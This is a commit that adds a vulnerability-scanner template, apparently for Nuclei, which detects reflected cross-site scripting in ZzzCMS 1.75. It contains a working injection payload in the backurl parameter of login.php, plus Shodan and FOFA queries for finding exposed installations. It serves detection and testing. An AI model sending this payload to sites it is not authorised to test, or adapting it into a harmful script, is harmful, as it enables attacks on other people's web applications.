Create zzzcms-xss.yaml

patch-1
Ritik Chaddha 2023-08-07 23:26:47 +05:30 committed by GitHub
parent 73adc3c1bf
commit cf6628114b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: zzzcms-xss
info:
name: Zzzcms 1.75 - Cross-Site Scripting
author: ritikchaddha
severity: medium
metadata:
max-request: 1
verified: true
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
tags: zzzcms,xss
http:
- raw:
- |
GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/XSS/)%20y%3d HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'onmouseover=alert(/XSS/) y=&act'
- 'document.write("'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200